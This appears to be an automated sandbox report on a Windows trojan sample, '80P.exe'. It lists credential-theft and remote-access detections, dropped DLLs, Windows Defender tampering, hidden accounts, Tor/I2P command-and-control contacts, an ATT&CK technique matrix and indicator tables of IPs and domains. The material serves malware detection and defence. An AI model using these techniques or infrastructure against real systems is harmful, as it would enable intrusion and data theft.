                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD67240 GetSystemTimeAsFileTime,20_2_00007FF6BFD67240
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0E1638C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,20_2_00007FFE0E1638C3
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.29.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.29.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.29.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.29.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0000001F.00000002.2934870565.00000201EAE17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2556948586.0000013B440BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: jvnu3e85o6ls9huft0apy3731vg.exe PID: 5840, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: main.exe PID: 4124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: main.exe PID: 7008, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_1d12cab9-8df1-4b73-ab59-8d57e46c430f\Report.wer, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E32.tmp.dmp, type: DROPPED
                    Source: Yara matchFile source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0000001F.00000002.2934870565.00000201EAE17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2556948586.0000013B440BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: jvnu3e85o6ls9huft0apy3731vg.exe PID: 5840, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: main.exe PID: 4124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: main.exe PID: 7008, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_1d12cab9-8df1-4b73-ab59-8d57e46c430f\Report.wer, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E32.tmp.dmp, type: DROPPED
                    Source: Yara matchFile source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg, type: DROPPED
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0E16240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,20_2_00007FFE0E16240A
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EB44F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,20_2_00007FFE0EB44F8A
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EBD240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,20_2_00007FFE0EBD240A
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EC0254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,20_2_00007FFE0EC0254A
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE11501ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,20_2_00007FFE11501ADA
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE133015FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,20_2_00007FFE133015FA
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE1331B820 listen,htons,recv,select,20_2_00007FFE1331B820
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE1331B7E8 bind,20_2_00007FFE1331B7E8
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE1330A7F1 bind,20_2_00007FFE1330A7F1
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE116B240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,31_2_00007FFE116B240A
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE116E4F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,31_2_00007FFE116E4F8A
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE1171240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,31_2_00007FFE1171240A
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE1174254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,31_2_00007FFE1174254A
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE11771ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,31_2_00007FFE11771ADA
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting
                    2
                    Valid Accounts
                    1
                    Windows Management Instrumentation
                    1
                    Scripting
                    1
                    DLL Side-Loading
                    21
                    Disable or Modify Tools
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    4
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    2
                    Valid Accounts
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop ProtocolData from Removable Media11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter
                    1
                    Create Account
                    2
                    Access Token Manipulation
                    3
                    Obfuscated Files or Information
                    Security Account Manager1
                    System Service Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts3
                    Service Execution
                    2
                    Valid Accounts
                    4
                    Windows Service
                    1
                    Software Packing
                    NTDS3
                    File and Directory Discovery
                    Distributed Component Object ModelInput Capture1
                    Multi-hop Proxy
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd4
                    Windows Service
                    11
                    Process Injection
                    1
                    Timestomp
                    LSA Secrets24
                    System Information Discovery
                    SSHKeylogging3
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                    Services File Permissions Weakness
                    1
                    Services File Permissions Weakness
                    1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Network Share Discovery
                    VNCGUI Input Capture4
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    File Deletion
                    DCSync131
                    Security Software Discovery
                    Windows Remote ManagementWeb Portal Capture2
                    Proxy
                    Exfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Masquerading
                    Proc Filesystem1
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                    Valid Accounts
                    /etc/passwd and /etc/shadow31
                    Virtualization/Sandbox Evasion
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                    Access Token Manipulation
                    Network Sniffing1
                    Application Window Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd31
                    Virtualization/Sandbox Evasion
                    Input Capture1
                    System Owner/User Discovery
                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
                    Process Injection
                    Keylogging1
                    System Network Configuration Discovery
                    Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                    Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                    Hidden Users
                    GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                    Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                    Services File Permissions Weakness
                    Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589221 Sample: 80P.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 81 reseed.onion.im 2->81 83 reseed-pl.i2pd.xyz 2->83 85 2 other IPs or domains 2->85 101 Antivirus detection for URL or domain 2->101 103 Multi AV Scanner detection for dropped file 2->103 105 Multi AV Scanner detection for submitted file 2->105 111 9 other signatures 2->111 9 main.exe 2->9         started        14 80P.exe 2 2->14         started        16 main.exe 2->16         started        18 2 other processes 2->18 signatures3 107 Uses TOR for connection hidding 81->107 109 Performs DNS queries to domains with low reputation 83->109 process4 dnsIp5 87 reseed-pl.i2pd.xyz 185.226.181.238 RACKMARKTES Spain 9->87 89 89.223.52.84 NEVALINK-ASRU Russian Federation 9->89 97 44 other IPs or domains 9->97 69 C:\Windows\Temp\wwgq2y6S, PE32+ 9->69 dropped 71 C:\Windows\Temp\oWkqS6Ji, PE32+ 9->71 dropped 73 C:\Windows\Temp\ia0qD2w9, PE32+ 9->73 dropped 79 16 other files (14 malicious) 9->79 dropped 127 Multi AV Scanner detection for dropped file 9->127 129 Contains functionality to hide user accounts 9->129 131 Found Tor onion address 9->131 20 WerFault.exe 9->20         started        91 45.200.148.158, 1129, 49730 Africa-on-Cloud-ASZA Seychelles 14->91 75 C:\Users\...\jvnu3e85o6ls9huft0apy3731vg.exe, PE32+ 14->75 dropped 77 C:\...\vlvy6qwtf6rg470fegk71sh09imwbh3.bat, DOS 14->77 dropped 23 jvnu3e85o6ls9huft0apy3731vg.exe 10 14->23         started        26 cmd.exe 1 14->26         started        93 95.31.23.9 SOVAM-ASRU Russian Federation 16->93 95 174.119.206.85 ROGERS-COMMUNICATIONSCA Canada 16->95 99 15 other IPs or domains 16->99 133 Detected unpacking (creates a PE file in dynamic memory) 18->133 28 WerFault.exe 18->28         started        file6 signatures7 process8 file9 61 C:\ProgramData\Microsoft\...\WER3E32.tmp.dmp, Mini 20->61 dropped 63 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->63 dropped 65 C:\Users\Public\...\main.exe, PE32+ 23->65 dropped 67 C:\Users\Public\...\update.pkg, data 23->67 dropped 115 Multi AV Scanner detection for dropped file 23->115 117 Contains functionality to hide user accounts 23->117 119 Machine Learning detection for dropped file 23->119 121 Found Tor onion address 23->121 30 taskkill.exe 1 23->30         started        32 sc.exe 1 23->32         started        34 sc.exe 1 23->34         started        45 4 other processes 23->45 123 Modifies Windows Defender protection settings 26->123 125 Adds a directory exclusion to Windows Defender 26->125 36 powershell.exe 23 26->36         started        39 powershell.exe 23 26->39         started        41 powershell.exe 19 26->41         started        43 conhost.exe 26->43         started        signatures10 process11 signatures12 47 conhost.exe 30->47         started        49 conhost.exe 32->49         started        51 conhost.exe 34->51         started        113 Loading BitLocker PowerShell Module 36->113 53 conhost.exe 45->53         started        55 conhost.exe 45->55         started        57 conhost.exe 45->57         started        59 conhost.exe 45->59         started        process13

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    80P.exe8%VirustotalBrowse
                    80P.exe5%ReversingLabs
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe100%Joe Sandbox ML
                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll26%ReversingLabsWin64.Trojan.Generic
                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll8%ReversingLabsWin64.Trojan.Generic
                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll32%ReversingLabsWin64.Trojan.Generic
                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll3%ReversingLabs
                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe70%ReversingLabsWin64.Trojan.Barys
                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll8%ReversingLabsWin64.Trojan.Generic
                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll3%ReversingLabs
                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll0%ReversingLabs
                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll3%ReversingLabs
                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll50%ReversingLabsWin64.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe70%ReversingLabsWin64.Trojan.Barys
                    C:\Windows\Temp\6DPA479I3%ReversingLabs
                    C:\Windows\Temp\9m9shiPj8%ReversingLabsWin64.Trojan.Generic
                    C:\Windows\Temp\I2Hoxnam50%ReversingLabsWin64.Trojan.Generic
                    C:\Windows\Temp\NCdDxWNe3%ReversingLabs
                    C:\Windows\Temp\TzijR9kt3%ReversingLabs
                    C:\Windows\Temp\ia0qD2w932%ReversingLabsWin64.Trojan.Generic
                    C:\Windows\Temp\ieIgHN2A0%ReversingLabs
                    C:\Windows\Temp\oWkqS6Ji8%ReversingLabsWin64.Trojan.Generic
                    C:\Windows\Temp\wwgq2y6S26%ReversingLabsWin64.Trojan.Generic
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://i2p.novg.net/V0%Avira URL Cloudsafe
                    https://reseed-fr.i2pd.xyz/p_lib.c0%Avira URL Cloudsafe
                    http://127.0.0.1:8118(0%Avira URL Cloudsafe
                    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtf0%Avira URL Cloudsafe
                    https://i2p.novg.net/0%Avira URL Cloudsafe
                    https://i2pseed.creativecowpat.net:8443/0%Avira URL Cloudsafe
                    https://reseed-fr.i2pd.xyz/0%Avira URL Cloudsafe
                    https://reseed.i2p-projekt.de/0%Avira URL Cloudsafe
                    http://reg.i2p/hosts.txtr0%Avira URL Cloudsafe
                    http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su30%Avira URL Cloudsafe
                    https://netdb.i2p2.no/100%Avira URL Cloudmalware
                    https://www2.mk16.de/0%Avira URL Cloudsafe
                    https://i2p.ghativega.in/0%Avira URL Cloudsafe
                    https://reseed.memcpy.io/0%Avira URL Cloudsafe
                    https://reseed.i2pgit.org/100%Avira URL Cloudmalware
                    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/0%Avira URL Cloudsafe
                    https://reseed2.i2p.net/hO100%Avira URL Cloudmalware
                    http://reg.i2p/hosts.txtl0%Avira URL Cloudsafe
                    https://reseed.i2pgit.org//p_lib.c100%Avira URL Cloudmalware
                    http://reg.i2p/hosts.txt0%Avira URL Cloudsafe
                    https://reseed.i2pgit.org/A100%Avira URL Cloudmalware
                    https://reseed-pl.i2pd.xyz/0%Avira URL Cloudsafe
                    http://127.0.0.1:81180%Avira URL Cloudsafe
                    https://reseed-pl.i2pd.xyz/p_lib.c0%Avira URL Cloudsafe
                    https://reseed.diva.exchange/100%Avira URL Cloudmalware
                    http://identiguy.i2p/hosts.txt0%Avira URL Cloudsafe
                    http://stats.i2p/cgi-bin/newhosts.txt0%Avira URL Cloudsafe
                    https://legit-website.com/i2pseeds.su30%Avira URL Cloudsafe
                    https://i2pd.readthedocs.io/en/latest/user-guide/configuration/0%Avira URL Cloudsafe
                    https://reseed.onion.im/0%Avira URL Cloudsafe
                    https://i2p.mooo.com/netDb/0%Avira URL Cloudsafe
                    https://reseed.stormycloud.org/k0%Avira URL Cloudsafe
                    http://rus.i2p/hosts.txt0%Avira URL Cloudsafe
                    https://reseed.stormycloud.org/0%Avira URL Cloudsafe
                    https://reseed2.i2p.net/100%Avira URL Cloudmalware
                    https://www2.mk16.de/(0%Avira URL Cloudsafe
                    https://banana.incognet.io/0%Avira URL Cloudsafe
                    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://0%Avira URL Cloudsafe
                    http://127.0.0.1:8118J?0%Avira URL Cloudsafe
                    https://reseed.onion.im/B0%Avira URL Cloudsafe
                    https://i2p.ghativega.in/p/p_lib.c0%Avira URL Cloudsafe
                    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reseed.i2pgit.org
                    68.183.196.133
                    truetrue
                      unknown
                      reseed.diva.exchange
                      80.74.145.70
                      truetrue
                        unknown
                        reseed.onion.im
                        159.223.194.171
                        truetrue
                          unknown
                          reseed-pl.i2pd.xyz
                          185.226.181.238
                          truetrue
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://reseed-fr.i2pd.xyz/main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                            • Avira URL Cloud: safe
                            unknown
                            https://i2p.novg.net/Vmain.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://127.0.0.1:8118(main.exe, 00000014.00000003.1898592051.0000013B45248000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000003.1898541929.0000013B45243000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://i2pseed.creativecowpat.net:8443/main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                            • Avira URL Cloud: safe
                            unknown
                            https://reseed.i2p-projekt.de/jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3main.exe, 00000014.00000002.2557742278.0000013B45297000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://i2p.novg.net/main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                            • Avira URL Cloud: safe
                            unknown
                            https://reseed-fr.i2pd.xyz/p_lib.cmain.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtfmain.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://reg.i2p/hosts.txtrmain.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://netdb.i2p2.no/jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://reseed.memcpy.io/main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                            • Avira URL Cloud: safe
                            unknown
                            https://i2p.ghativega.in/main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                            • Avira URL Cloud: safe
                            unknown
                            http://upx.sf.netAmcache.hve.29.drfalse
                              high
                              http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://reseed.i2pgit.org/main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                              • Avira URL Cloud: malware
                              unknown
